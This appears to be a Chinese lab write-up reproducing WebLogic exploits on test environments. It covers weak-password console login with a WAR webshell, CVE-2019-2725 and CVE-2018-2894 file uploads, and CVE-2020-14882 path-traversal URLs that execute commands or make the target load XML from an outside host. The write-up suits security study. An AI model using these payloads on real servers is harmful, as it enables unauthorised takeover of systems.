WebLogic漏洞再现

一、后台弱口令GetShell

1、开环境

2、访问目录

console/login/LoginForm.jsp

3、登录后台

通过弱口令登录后台

weblogic/Oracle@123

4、上传war包

部署-安装-上载文件

上传一个war包，然后一直下一步

去访问我们的木马文件

5、测试连接

二、CVE-2017-3506

1、开环境

环境就是上一个的环境不用变，访问目录即可

/wls-wsat/CoordinatorPortType

2、在当前页抓包，添加请求包

改为POST传参，文件类型改为text/xml，添加请求包

3、在服务器开启监听

把修改好的包发送出去

4、监听成功

三、CVE-2019-2725

1、开环境

还是上一个的环境，需要访问目录

_async/AsyncResponseService

2、在当前页抓包，添加请求包

改为POST传参，修改文件类型为text/xml，添加请求包

请求包中的150.158.199.164/1.txt代表着把我们网站的根目录下的1.txt上传到他的电脑上，并重命名为wjf.jsp

3、在我们网站的根目录上传一个1.txt文件，里面放的是哥斯拉生成的木马

4、发送数据包

5、访问我们上传的wjf.jsp文件

/bea_wls_internal/wjf.jsp

6、测试连接

四、CVE-2018-2628

1、开环境

2、利用工具

输入网址，检查

存在漏洞之后执行命令

五、CVE-2018-2894

1、开环境

访问路径/console/login/LoginForm.jsp

2、获取密码

docker-compose logs | grep password

3、登录

4、设置服务开启

域结构——base-domain——高级——启动WEB服务测试页——保存

5、进入config.do 文件进行设置

/ws_utc/config.do

修改目录，保存

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

6、安全，添加文件

7、访问目录

150.158.199.164:7001/ws_utc/config/keystore/1742717964975_1.jsp

f12，点左边的小箭头，再点上面的1，就可以显示出来id

访问地址

/ws_utc/css/config/keystore/1742717964975_1.jsp

8、得知文件已经上传，测试连接

六、CVE-2020-14882

1、开环境

2、访问目录

需要使用一下URL绕过

/​​​​​​console/css/%252e%252e%252fconsole.portal

3、在云服务器上执行命令，进入容器

docker exec -it 容器id /bin/bash

进来之后输入URL

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")

执行命令ls /tmp

可以看到success已经在里面了

还有一种方法

在我们的服务器新建一个xml文件

监听端口6666

访问文件,监听端口

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://150.158.199.164:7001/2.xml")